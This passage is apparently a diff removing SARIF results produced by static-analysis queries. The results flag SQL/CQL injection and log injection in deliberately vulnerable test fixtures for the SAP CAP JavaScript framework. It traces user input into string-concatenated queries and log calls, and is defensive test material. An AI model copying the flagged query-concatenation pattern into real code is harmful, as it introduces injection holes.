"%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 27, - "startColumn" : 17, - "endColumn" : 63 - } - }, - "message" : { - "text" : "CQL`SEL ... + book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 27, - "startColumn" : 11, - "endColumn" : 63 - } - }, - "message" : { - "text" : "cqn" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 28, - "startColumn" : 39, - "endColumn" : 42 - } - }, - "message" : { - "text" : "cqn" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 31, - "startColumn" : 39, - "endColumn" : 43 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "1cd6f1adc2ef8f7c:1", - "primaryLocationStartColumnFingerprint" : "32" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 30, - "startColumn" : 56, - "endColumn" : 60 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 30, - "startColumn" : 32, - "endColumn" : 60 - } - }, - "message" : { - "text" : "`SELECT ... + book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 30, - "startColumn" : 18, - "endColumn" : 61 - } - }, - "message" : { - "text" : "cds.par ... + book)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 30, - "startColumn" : 11, - "endColumn" : 61 - } - }, - "message" : { - "text" : "cqn1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 31, - "startColumn" : 39, - "endColumn" : 43 - } - }, - "message" : { - "text" : "cqn1" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 11, - "startColumn" : 16, - "endColumn" : 29 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "eae426bf8fad0192:1", - "primaryLocationStartColumnFingerprint" : "9" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 11, - "startColumn" : 25, - "endColumn" : 29 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 11, - "startColumn" : 16, - "endColumn" : 29 - } - }, - "message" : { - "text" : "\"CAP:\" + book" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 18, - "startColumn" : 47, - "endColumn" : 48 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "e05b39891dddd161:1", - "primaryLocationStartColumnFingerprint" : "40" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 15, - "startColumn" : 24, - "endColumn" : 27 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 18, - "startColumn" : 17, - "endColumn" : 20 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 18, - "startColumn" : 17, - "endColumn" : 25 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 18, - "startColumn" : 13, - "endColumn" : 25 - } - }, - "message" : { - "text" : "$" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 18, - "startColumn" : 47, - "endColumn" : 48 - } - }, - "message" : { - "text" : "$" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 15, - "startColumn" : 24, - "endColumn" : 27 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 25, - "startColumn" : 16, - "endColumn" : 29 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "4dc77ce4a9b7031e:1", - "primaryLocationStartColumnFingerprint" : "9" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 34, - "endColumn" : 54 - } - }, - "message" : { - "text" : "req2.params.category" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 13, - "endColumn" : 54 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 25, - "startColumn" : 25, - "endColumn" : 29 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 25, - "startColumn" : 16, - "endColumn" : 29 - } - }, - "message" : { - "text" : "\"CAP:\" + book" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 34, - "endColumn" : 54 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "7c291d40b7c61d4f:1", - "primaryLocationStartColumnFingerprint" : "23" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 38 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 43 - } - }, - "message" : { - "text" : "msg.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 32 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - }, - "region" : { - "startLine" : 7, - "startColumn" : 17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 43 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - }, - "message" : { - "text" : "messageToPass" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 108 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "7c291d40b7c61d4f:1", - "primaryLocationStartColumnFingerprint" : "23" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - }, - "region" : { - "startLine" : 6, - "startColumn" : 33, - "endColumn" : 36 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - }, - "region" : { - "startLine" : 7, - "startColumn" : 39, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - }, - "region" : { - "startLine" : 7, - "startColumn" : 39, - "endColumn" : 47 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - }, - "region" : { - "startLine" : 7, - "startColumn" : 19, - "endColumn" : 36 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - }, - "region" : { - "startLine" : 7, - "startColumn" : 21, - "endColumn" : 34 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - }, - "region" : { - "startLine" : 7, - "startColumn" : 19, - "endColumn" : 47 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - }, - "region" : { - "startLine" : 9, - "startColumn" : 38, - "endColumn" : 51 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - }, - "region" : { - "startLine" : 9, - "startColumn" : 36, - "endColumn" : 53 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 108 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 108 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 38 - } - }, - "message" : { - "text" : "msg" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 108 - }, - "region" : { - "startLine" : 7, - "startColumn" : 35, - "endColumn" : 43 - } - }, - "message" : { - "text" : "msg.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 108 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 32 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 108 - }, - "region" : { - "startLine" : 7, - "startColumn" : 17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 108 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 43 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 108 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - }, - "message" : { - "text" : "messageToPass" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - }, - "region" : { - "startLine" : 6, - "startColumn" : 33, - "endColumn" : 36 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1).\nLog entry depends on a [user-provided value](2)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "7c291d40b7c61d4f:1", - "primaryLocationStartColumnFingerprint" : "23" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - }, - "region" : { - "startLine" : 6, - "startColumn" : 33, - "endColumn" : 36 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - }, - "region" : { - "startLine" : 7, - "startColumn" : 39, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - }, - "region" : { - "startLine" : 7, - "startColumn" : 39, - "endColumn" : 47 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - }, - "region" : { - "startLine" : 7, - "startColumn" : 19, - "endColumn" : 36 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - }, - "region" : { - "startLine" : 7, - "startColumn" : 21, - "endColumn" : 34 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - }, - "region" : { - "startLine" : 7, - "startColumn" : 19, - "endColumn" : 47 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - }, - "region" : { - "startLine" : 9, - "startColumn" : 38, - "endColumn" : 51 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - }, - "region" : { - "startLine" : 9, - "startColumn" : 36, - "endColumn" : 53 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - 